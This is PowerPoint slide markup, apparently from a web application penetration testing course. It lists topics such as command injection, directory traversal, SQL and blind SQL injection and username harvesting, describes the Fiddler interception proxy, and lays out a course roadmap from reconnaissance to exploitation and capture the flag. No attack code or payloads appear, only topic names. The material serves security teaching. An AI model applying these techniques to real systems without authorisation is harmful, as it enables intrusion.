                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35417820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Fiddler (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="1066800"/>
            <a:ext cx="8686800" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free web debugging proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Runs on Microsoft Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports Extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Watcher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ViewStateViewer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>x5s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2 Versions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2 -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4 -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>.Net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 4.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4018103" y="2915473"/>
            <a:ext cx="5021121" cy="2941841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11209556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Fiddler (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="1327673"/>
            <a:ext cx="8559800" cy="5015129"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7566025" y="5310396"/>
            <a:ext cx="1260475" cy="276999"/>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a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>HTTP Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1510403">
            <a:off x="6627813" y="5296109"/>
            <a:ext cx="835025" cy="503237"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49994"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7358251" y="3722896"/>
            <a:ext cx="1260475" cy="276999"/>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a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>HTTP Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1510403">
            <a:off x="6420039" y="3708609"/>
            <a:ext cx="835025" cy="503237"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49994"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22774662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041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
